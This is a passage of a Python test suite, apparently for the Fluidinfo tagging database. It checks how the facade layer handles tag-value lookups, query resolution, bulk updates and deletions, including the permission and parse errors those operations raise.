objectID = uuid4()
createTagValue(user.id, tag.id, objectID, 42)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.hasTagInstance(session, u'fred/bar',
str(objectID))
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'fred/bar', error.path)
@inlineCallbacks
def testHasTagInstanceExists(self):
"""
L{FacadeTagValueMixin.hasTagInstance} returns C{True} if a L{Tag.path}
on an object exists.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
createTagValue(self.user.id, tag.id, objectID, 42)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.hasTagInstance(
session, u'username/bar', str(objectID))
self.assertTrue(results)
@inlineCallbacks
def testHasTagInstanceNotExists(self):
"""
L{FacadeTagValueMixin.hasTagInstance} returns C{False} if a L{Tag.path}
on an object doesn't exist.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.hasTagInstance(
session, u'username/bar', str(objectID))
results = guessValue(results)
self.assertFalse(results)
@inlineCallbacks
def testDeleteTagInstanceUnknownTag(self):
"""
L{FacadeTagValueMixin.deleteTagInstance} raises a L{TNonexistentTag}
exception if the requested L{Tag.path} doesn't exist.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteTagInstance(
session, u'username/unknown', str(uuid4()))
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'username/unknown', error.path)
@inlineCallbacks
def testDeleteTagInstancePermissionDenied(self):
"""
L{FacadeTagValueMixin.deleteTagInstance} raises a
L{TPathPermissionDenied} exception if the user doesn't have
C{Operation.DELETE_TAG_VALUE} permission.
"""
UserAPI().create([(u'fred', u'password', u'User',
u'fred@example.com')])
user = getUser(u'username')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description')])
tag = getTags(paths=[u'fred/bar']).one()
values = [(u'fred/bar', Operation.DELETE_TAG_VALUE, Policy.CLOSED,
[u'fred'])]
permissions.set(values)
objectID = uuid4()
createTagValue(user.id, tag.id, objectID, 42)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteTagInstance(session, u'fred/bar',
str(objectID))
error = yield self.assertFailure(deferred, TPathPermissionDenied)
self.assertEqual(u'tag-values', error.category)
self.assertEqual('delete', error.action)
self.assertEqual(u'fred/bar', error.path)
@inlineCallbacks
def testDeleteTagInstance(self):
"""
L{FacadeTagValueMixin.deleteTagInstance} deletes a L{TagValue} on a
given object.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
createTagValue(self.user.id, tag.id, objectID, 42)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.deleteTagInstance(session, u'username/bar',
str(objectID))
self.store.rollback()
result = getTagValues([(objectID, tag.id)])
self.assertTrue(result.is_empty())
class FacadeTagValueMixinQueriesTest(FluidinfoTestCase):
resources = [('cache', CacheResource()),
('client', IndexResource()),
('config', ConfigResource()),
('log', LoggingResource()),
('store', DatabaseResource()),
('threadPool', ThreadPoolResource())]
def setUp(self):
super(FacadeTagValueMixinQueriesTest, self).setUp()
createSystemData()
self.transact = Transact(self.threadPool)
factory = FluidinfoSessionFactory('API-9000')
self.facade = Facade(self.transact, factory)
UserAPI().create([(u'username', u'password', u'User',
u'user@example.com')])
self.user = getUser(u'username')
self.permissions = CachingPermissionAPI(self.user)
self.store.commit()
self.config.set('service', 'development', 'true')
@inlineCallbacks
def testResolveQueryWithWrongEncoding(self):
"""
L{FacadeTagValueMixin.resolveQuery} raises L{TBadRequest} if the query
is not properly encoded in UTF-8.
"""
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.resolveQuery(session,
'fluiddb/about == "\xFF"')
yield self.assertFailure(deferred, TBadRequest)
@inlineCallbacks
def testResolveQueryWithParseError(self):
"""
L{FacadeTagValueMixin.resolveQuery} raises L{TParseError} if the query
is not well formed.
"""
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.resolveQuery(session, 'wrong query >:)')
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testResolveQueryWithIllegalQuery(self):
"""
L{FacadeTagValueMixin.resolveQuery} raises L{TBadRequest} if the query
contains an illegal expression.
"""
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.resolveQuery(session, 'has fluiddb/about')
yield self.assertFailure(deferred, TBadRequest)
@inlineCallbacks
def testResolveQueryWithSearchError(self):
"""
L{FacadeTagValueMixin.resolveQuery} raises L{TParseError} if the query
is not well formed.
"""
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.resolveQuery(session, 'has fluiddb/id')
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testResolveQueryWithPermissionDeniedError(self):
"""
L{FacadeTagValueMixin.resolveQuery} raises L{TNonexistentTag} if
the user doesn't have READ permissions on tags in the query.
"""
TagAPI(self.user).create([(u'username/tag', u'description')])
permissions = CachingPermissionAPI(self.user)
values = [(u'username/tag', Operation.READ_TAG_VALUE,
Policy.CLOSED, [])]
permissions.set(values)
self.store.commit()
runDataImportHandler(self.client.url)
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.resolveQuery(session,
'username/tag = "value"')
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'username/tag', error.path)
@inlineCallbacks
def testResolveQueryWithUnknownPaths(self):
"""
L{FacadeTagValueMixin.resolveQuery} raises L{TNonexistentTag} if a path
in the query doesn't exist.
"""
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.resolveQuery(session, 'unknown/tag = 26')
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual('unknown/tag', error.path)
@inlineCallbacks
def testResolveQuery(self):
"""
L{FacadeTagValueMixin.resolveQuery} returns the results of a query.
"""
TagAPI(self.user).create([(u'username/tag1', u'description'),
(u'username/tag2', u'description')])
self.store.commit()
object1 = uuid4()
object2 = uuid4()
TagValueAPI(self.user).set({object1: {u'username/tag1': 20,
u'username/tag2': 20},
object2: {u'username/tag1': 20,
u'username/tag2': 20},
uuid4(): {u'username/tag1': 20,
u'username/tag2': 10}})
runDataImportHandler(self.client.url)
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.resolveQuery(session,
'username/tag2 = 20')
self.assertEqual(sorted([str(object1), str(object2)]),
sorted(results))
@inlineCallbacks
def testUpdateValuesForQueriesWithInvalidQuery(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a
L{TParseError} exception if the incoming L{Query} can't be parsed.
"""
queryItems = [(u'username/unknown 42',
[TagPathAndValue(u'username/unknown', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testUpdateValuesForQueriesWithIllegalQuery(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a L{TBadRequest}
exception if the incoming L{Query} contains an illegal expression.
"""
queryItems = [(u'has fluiddb/about',
[TagPathAndValue(u'username/unknown', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
yield self.assertFailure(deferred, TBadRequest)
@inlineCallbacks
def testUpdateValuesForQueriesWithSearchError(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a
L{TParseError} exception if the incoming L{Query} can't be parsed.
"""
value = TagPathAndValue(u'username/unknown', 2600)
items = [(u'has fluiddb/id', [value])]
schema = ValuesQuerySchema(items)
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.updateValuesForQueries(session, schema)
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testUpdateValuesForQueriesWithUnknownTagInQuery(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a
L{TNonexistentTag} exception if any of the requested L{Tag.path} in the
L{Query} doesn't exist.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description'),
(u'username/foo', u'description')])
objectID1 = uuid4()
objectID2 = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID1: {u'username/foo': 12},
objectID2: {u'username/foo': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [
(u'username/unknown-to-read = 42 or username/foo = 12',
[TagPathAndValue(u'username/bar', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
yield self.assertFailure(deferred, TNonexistentTag)
@inlineCallbacks
def testUpdateValuesForQueriesWithUncreatablePaths(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a
L{TNonexistentTag} exception if any of the L{Tag.path}s to set don't
exist and the L{User} making the request doesn't have permission to
create them.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {uuid4(): {u'username/bar': 42}}
SecureTagValueAPI(self.user).set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [
(u'username/bar = 42',
[TagPathAndValue(u'wubble/unknown-to-set', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'wubble/unknown-to-set', error.path)
@inlineCallbacks
def testUpdateValuesForQueriesWithImplicitTags(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} implicitly creates
missing L{Tag}s if the L{User} has permission to create them.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
objectID = uuid4()
values = {objectID: {u'username/bar': 42}}
tagValues = SecureTagValueAPI(self.user)
tagValues.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/unknown', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = tagValues.get([objectID], [u'username/unknown'])
tagValue = result[objectID][u'username/unknown'].value
self.assertEqual(2600, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithImplicitTagsWithMalformedPaths(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises L{TInvalidPath} if
the given paths for nonexitent L{Tags} are invalid.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
objectID = uuid4()
values = {objectID: {u'username/bar': 42}}
tagValues = SecureTagValueAPI(self.user)
tagValues.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/$bad!', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
yield self.assertFailure(deferred, TInvalidPath)
@inlineCallbacks
def testUpdateValuesForQueriesWithImplicitNamespaces(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} implicitly creates
missing L{Namespace}s and L{Tag}s if the L{User} has permission to
create them.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
objectID = uuid4()
values = {objectID: {u'username/bar': 42}}
tagValues = SecureTagValueAPI(self.user)
tagValues.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar/foo', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = tagValues.get([objectID], [u'username/bar/foo'])
tagValue = result[objectID][u'username/bar/foo'].value
self.assertEqual(2600, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithImplicitNestedNamespaces(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} implicitly creates
missing L{Namespace}s and L{Tag}s if the L{User} has permission to
create them.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
objectID = uuid4()
values = {objectID: {u'username/bar': 42}}
tagValues = SecureTagValueAPI(self.user)
tagValues.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar/foo/baz', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = tagValues.get([objectID], [u'username/bar/foo/baz'])
tagValue = result[objectID][u'username/bar/foo/baz'].value
self.assertEqual(2600, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithReadPermissionDenied(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a
L{TNonexistentTag} exception if the user doesn't have
C{Operation.READ_TAG_VALUE} permission on any of the L{Tag}s in the
L{Query}.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'username')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description'),
(u'fred/unreadable', u'description')])
values = [(u'fred/unreadable', Operation.READ_TAG_VALUE,
Policy.CLOSED, [u'fred'])]
permissions.set(values)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'fred/unreadable = 42',
[TagPathAndValue(u'fred/bar', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'fred/unreadable', error.path)
@inlineCallbacks
def testUpdateValuesForQueriesWithWritePermissionDenied(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} raises a
L{TPathPermissionDenied} exception if the user doesn't have
C{Operation.WRITE_TAG_VALUE} permission on any of the outgoing L{Tag}s.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'fred')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description'),
(u'fred/unwritable', u'description')])
values = {uuid4(): {u'fred/bar': 42}}
SecureTagValueAPI(user).set(values)
runDataImportHandler(self.client.url)
values = [(u'fred/unwritable', Operation.WRITE_TAG_VALUE,
Policy.CLOSED, [u'fred'])]
permissions.set(values)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'fred/bar = 42',
[TagPathAndValue(u'fred/unwritable', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
deferred = self.facade.updateValuesForQueries(session,
valuesQuerySchema)
error = yield self.assertFailure(deferred, TPathPermissionDenied)
self.assertEqual(u'tag-values', error.category)
self.assertEqual('write', error.action)
self.assertEqual(u'fred/unwritable', error.path)
@inlineCallbacks
def testUpdateValuesForQueriesWithEmptyQueryResults(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} does not fail if a
L{Query} results in an empty C{set}.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 123',
[TagPathAndValue(u'username/bar', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'username/bar'])
tagValue = result[objectID][u'username/bar'].value
self.assertEqual(42, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithUnicodeAboutValue(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store a C{unicode}
string when the query involves a C{unicode} about-value.
"""
with login(u'username', uuid4(), self.transact) as session:
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = yield self.facade.createObject(
session, about=u'éric serra'.encode('utf-8'))
objectID = UUID(objectID)
self.store.rollback()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'fluiddb/about = "éric serra"',
[TagPathAndValue(u'username/bar', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'fluiddb/about'])
about = result[objectID][u'fluiddb/about'].value
self.assertEqual(u'éric serra', about)
result = valuesAPI.get([objectID], [u'username/bar'])
tagValue = result[objectID][u'username/bar'].value
self.assertEqual(2600, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithIntValue(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store an C{int}.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar', 2600)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'username/bar'])
tagValue = result[objectID][u'username/bar'].value
self.assertEqual(2600, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithMultipleQueries(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can solve multiple
L{Query}s and store the appropiate L{TagValue}s.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID1 = uuid4()
objectID2 = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID1: {u'username/bar': 42},
objectID2: {u'username/bar': 1234}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar', 2600)]),
(u'username/bar = 1234',
[TagPathAndValue(u'username/bar', 4321)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID1, objectID2], [u'username/bar'])
tagValue1 = result[objectID1][u'username/bar'].value
tagValue2 = result[objectID2][u'username/bar'].value
self.assertEqual(2600, tagValue1)
self.assertEqual(4321, tagValue2)
@inlineCallbacks
def testUpdateValuesForQueriesWithFloatValue(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store a C{float}.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar', 12.34)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'username/bar'])
tagValue = result[objectID][u'username/bar'].value
self.assertEqual(12.34, tagValue)
@inlineCallbacks
def testUpdateValuesForQueriesWithSetValue(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store a C{set} of
C{unicode} strings.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar',
[u'foo', u'bar'])])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'username/bar'])
self.assertEqual([u'foo', u'bar'],
result[objectID][u'username/bar'].value)
@inlineCallbacks
def testUpdateValuesForQueriesWithNoneValue(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store a C{None}.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar', None)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'username/bar'])
self.assertEqual(None,
result[objectID][u'username/bar'].value)
@inlineCallbacks
def testUpdateValuesForQueriesWithBoolValue(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store a C{bool}.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryItems = [(u'username/bar = 42',
[TagPathAndValue(u'username/bar', True)])]
valuesQuerySchema = ValuesQuerySchema(queryItems)
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
result = valuesAPI.get([objectID], [u'username/bar'])
self.assertTrue(result[objectID][u'username/bar'])
@inlineCallbacks
def testUpdateValuesForQueriesWithMixedValues(self):
"""
L{FacadeTagValueMixin.updateValuesForQueries} can store L{TagValue}s
of different types: C{bool}, C{None}, C{int}, C{float}, C{unicode} and
C{set} of C{unicode}.
"""
SecureTagAPI(self.user).create([(u'username/test1', u'description'),
(u'username/test2', u'description'),
(u'username/test3', u'description'),
(u'username/test4', u'description'),
(u'username/test5', u'description'),
(u'username/test6', u'description')])
paths = [u'username/test1', u'username/test2', u'username/test3',
u'username/test4', u'username/test5', u'username/test6']
tags = list(getTags(paths=paths))
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/test1': 42}}
SecureTagValueAPI(self.user).set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
queryValues = {u'username/test1': True,
u'username/test2': None,
u'username/test3': 123,
u'username/test4': 12.34,
u'username/test5': u'test',
u'username/test6': [u'a', u'b']}
valuesQuerySchema = ValuesQuerySchema(
[(u'username/test1 = 42',
[TagPathAndValue(path, value) for path, value
in queryValues.iteritems()])])
yield self.facade.updateValuesForQueries(session,
valuesQuerySchema)
expected = {objectID: queryValues}
result = dict()
tagPairs = [(objectID, tag.id) for tag in tags]
values = getTagValues(values=tagPairs)
for value in values:
if not result.get(value.objectID):
result[value.objectID] = {}
result[value.objectID][value.tag.path] = value.value
self.assertEqual(expected, result)
@inlineCallbacks
def testDeleteValuesForQueryWithInvalidQuery(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} raises a L{TParseError}
exception if the incoming L{Query} can't be parsed.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteValuesForQuery(
session, u'username/unknown 42', [u'username/unknown'])
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testDeleteValuesForQueryWithIllegalQuery(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} raises a L{TBadRequest}
exception if the incoming L{Query} contains an illegal expression.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteValuesForQuery(
session, u'has fluiddb/about', [u'username/unknown'])
yield self.assertFailure(deferred, TBadRequest)
@inlineCallbacks
def testDeleteValuesForQueryWithSearch(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} raises a L{TParseError}
exception if the incoming L{Query} can't be parsed.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteValuesForQuery(
session, u'has fluiddb/id', [u'username/unknown'])
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testDeleteValuesForQueryWithUnknownTag(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} raises a
L{TNonexistentTag} exception if any of the requested L{Tag.path} don't
exist.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description'),
(u'username/foo', u'description')])
objectID1 = uuid4()
objectID2 = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID1: {u'username/foo': 12,
u'username/bar': u'test1'},
objectID2: {u'username/foo': 42,
u'username/bar': u'test2'}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteValuesForQuery(
session, u'username/unknown = 42 or username/foo = 12',
[u'username/bar'])
yield self.assertFailure(deferred, TNonexistentTag)
@inlineCallbacks
def testDeleteValuesForQueryWithMissingTag(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} does not raise an exception
if any of the requested L{Tag.path} are not present on any matching
objects.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description'),
(u'username/foo', u'description')])
objectID1 = uuid4()
objectID2 = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID1: {u'username/foo': 12},
objectID2: {u'username/foo': 42,
u'username/bar': u'test2'}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.deleteValuesForQuery(
session, u'username/foo = 12',
[u'username/bar'])
@inlineCallbacks
def testDeleteValuesForQueryWithReadPermissionDenied(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} raises a
L{TNonexistentTag} exception if the user doesn't have
C{Operation.READ_TAG_VALUE} permission on any of the L{Tag}s in the
L{Query}.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'username')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description')])
values = [(u'fred/bar', Operation.READ_TAG_VALUE,
Policy.CLOSED, [u'fred'])]
permissions.set(values)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteValuesForQuery(
session, u'fred/bar = 42', [u'fred/bar'])
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'fred/bar', error.path)
@inlineCallbacks
def testDeleteValuesForQueryWithDeletePermissionDenied(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} raises a
L{TPathPermissionDenied} exception if the user doesn't have
C{Operation.DELETE_TAG_VALUE} permission on any of the outgoing
L{Tag}s.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'fred')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description'),
(u'fred/foo', u'description')])
SecureTagValueAPI(user).set({uuid4(): {u'fred/foo': 42}})
runDataImportHandler(self.client.url)
permissions.set([(u'fred/foo', Operation.DELETE_TAG_VALUE,
Policy.CLOSED, [u'fred'])])
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.deleteValuesForQuery(
session, u'fred/foo = 42', [u'fred/foo'])
error = yield self.assertFailure(deferred, TPathPermissionDenied)
self.assertEqual(u'tag-values', error.category)
self.assertEqual('delete', error.action)
self.assertEqual(u'fred/foo', error.path)
@inlineCallbacks
def testDeleteValuesForQuery(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} deletes the L{TagValue}
of an object if the L{Query} matches and the L{User} has permissions.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID1 = uuid4()
objectID2 = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID1: {u'username/bar': 42},
objectID2: {u'username/bar': 123}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.deleteValuesForQuery(
session, u'username/bar = 42', [u'username/bar'])
result = valuesAPI.get([objectID1, objectID2],
[u'username/bar'])
tagValue = result[objectID2][u'username/bar'].value
self.assertEqual(123, tagValue)
@inlineCallbacks
def testDeleteValuesForQueryWithoutReturnTags(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} deletes all available
L{TagValue}s for the objects the L{Query} matches and that the L{User}
has L{Operation.DELETE_TAG_VALUE} permission for.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID1 = uuid4()
objectID2 = uuid4()
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set({objectID1: {u'username/bar': 42},
objectID2: {u'username/bar': 123}})
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.deleteValuesForQuery(session,
u'username/bar = 42')
